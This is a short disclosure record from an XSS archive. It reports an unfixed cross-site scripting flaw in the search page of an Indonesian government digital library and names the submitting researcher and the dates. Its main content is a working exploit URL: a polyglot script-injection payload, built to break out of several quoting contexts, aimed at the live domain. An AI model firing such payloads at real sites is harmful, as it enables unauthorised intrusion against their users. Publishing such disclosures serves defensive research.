Security researcher vir0e5, has submitted on 21/06/2010 a cross-site-scripting (XSS) vulnerability affecting digilib.litbang.depkes.go.id, which at the time of submission ranked 79851 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/06/2010 |
Date published: 18/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: vir0e5 |
Domain: digilib.litbang.depkes.go.id |
Category: XSS |
Pagerank: 79851 |
URL: http://digilib.litbang.depkes.go.id/search.php?s=dc_person&frm[TAG][]=fullname&frm[q][]=';alert(Stri ng.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88, 83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode( 88,83,83))</SCRIPT>&frm[BOL][]=AND&frm[TAG][]=fullname&frm[q][]=&frm[BOL][]=AND&frm[TAG][]=fullname& frm[q][]=&frm[BOL][]=AND&frm[TAG][]=fullname&frm[q][]=&frm[BOL][]=AND&frm[TAG][]=fullname&frm[q][]=& frm[BOL][]=AND&frm[TAG][]=fullname&frm[q][]=&frm[BOL][]=AND&frm[TAG][]=fullname&frm[q][]=&frm[BOL][] =AND&B=Search |
Click here to view the mirror
|
|
|